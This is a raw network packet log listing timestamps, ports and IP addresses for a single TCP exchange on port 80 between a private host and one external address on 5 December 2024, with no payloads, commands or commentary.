Dec 5, 2024 17:32:17.241997957 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.242019892 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.242042065 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.242794991 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.242831945 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.243374109 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.243431091 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.243796110 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.243993044 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.244049072 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.244760990 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.244822979 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.245284081 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.245332003 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.245496035 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.245517015 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.245529890 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.245548010 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.246274948 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.246300936 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.246342897 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.247200012 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.247246027 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.247647047 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.247689009 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.248155117 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.248202085 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.248243093 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.249152899 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.249208927 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.249871969 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.249914885 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.249985933 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.249998093 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.250021935 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.250039101 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.250880957 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.250958920 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.251007080 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.251873016 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.251996994 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.252049923 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.252744913 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.252796888 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.253458977 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.253509045 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.253725052 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.253745079 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.253767014 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.253778934 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.254627943 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.254678965 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.255431890 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.255477905 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.255547047 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.255620956 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.255645037 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.255681038 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.256470919 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.256666899 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.256731033 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.257400036 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.257442951 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.257687092 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.257767916 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.258358002 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.258399963 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.258727074 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.258764982 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.259263992 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.259303093 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.259337902 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.259380102 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.260255098 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.260643959 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.260699987 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.261145115 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.261202097 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.261847019 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.261898994 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.262080908 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.262094021 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.262119055 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.262134075 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.263060093 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.263734102 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.264014006 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.264034986 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.264056921 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.264074087 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.264333010 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.264370918 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.265002966 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.265014887 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.265055895 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.265820980 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.265881062 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.266093969 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.266136885 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.266834974 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.266846895 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.266875029 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.266931057 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.267632008 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.267723083 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.267855883 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.267918110 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.268620014 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.268660069 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.268697977 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.268734932 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.269546986 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.269582987 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.269860029 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.269895077 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.270417929 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.270456076 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.270853043 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.270891905 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.271378040 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.271414995 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.271580935 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.271625042 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.272304058 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.272663116 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.272720098 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.273241043 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.273281097 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.273591995 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.273631096 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.274183035 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.274220943 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.274378061 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.274410963 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.275068998 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.275106907 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.275192022 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.275238037 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.276014090 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.276884079 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.276949883 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.276976109 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.276988983 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.277012110 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.277036905 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.277961016 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.277973890 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.278021097 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.278800011 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.278842926 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.278959990 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.278999090 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.279829979 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.279994965 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.280047894 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.280679941 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.280725002 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.280992031 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.281028986 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.281730890 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.281770945 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.282802105 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.282814980 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.282855034 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.282871008 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.282963991 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.283739090 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.283792019 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.283828974 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.284140110 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.284177065 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.284593105 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.284630060 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.284742117 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.284775972 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.285518885 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.285532951 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.285561085 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.285593033 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.286221981 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.287744999 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.430136919 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.430150986 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.430165052 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.430205107 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.430242062 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.430253983 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.430282116 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.430830002 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.430880070 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.430910110 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.430942059 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.431716919 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.431754112 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.431796074 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.431838036 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.432507992 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.432677984 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.432708025 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.432708025 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.433446884 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.434422016 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.434436083 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.434448957 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.434457064 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.434493065 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.435334921 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.435365915 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.435446978 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.435480118 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.436325073 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.436702013 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.436733961 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.437241077 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.437275887 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.437443018 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.437475920 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.438142061 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.438175917 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.438245058 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.438275099 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.439034939 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.439605951 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.439650059 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.439971924 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.440007925 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.440536022 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.440730095 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.441034079 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.441052914 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.441078901 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.441107988 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.441828966 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.441865921 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.442069054 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.442101002 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.442796946 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.442929983 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.443144083 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.443176985 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.443689108 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.443722010 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.443895102 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.444005966 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.444623947 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.444657087 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.445025921 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.445069075 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.445588112 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.445631027 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.445919037 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.445956945 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.446500063 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.446537018 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.446953058 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.447093964 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.447441101 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.447453976 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.447479963 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.447504997 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.448369026 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.448402882 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.448406935 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.448436022 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.449388981 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.449440956 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.449621916 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.449657917 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.450287104 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.450320959 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.451025963 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.451066017 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.451196909 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.451282978 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.451350927 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.451381922 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.452243090 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.452281952 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.452655077 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.452750921 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.453084946 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.453100920 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.453134060 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.453269005 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.454027891 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.454041958 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.454070091 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.454099894 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.454936981 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.454982996 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.455662966 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.455743074 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.455867052 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.455879927 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.455904007 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.455924988 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.456752062 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.456803083 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.457261086 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.457304001 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.457654953 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.457695007 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.457778931 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.457834959 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.458587885 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.458627939 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.459378004 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.459419966 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.459557056 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.459569931 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.459594965 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.459606886 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.460473061 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.460526943 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.460650921 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.460783958 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.461612940 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.461649895 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.461813927 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.461926937 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.462338924 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.462459087 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.462496996 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.462527037 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.463263035 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.463300943 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.463471889 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.463695049 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.464164019 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.464201927 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.464745998 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.464848042 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.465135098 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.465147018 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.465190887 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.466103077 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.466144085 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.466186047 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.466247082 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.466967106 CET	80	49793	185.215.113.84	192.168.2.11
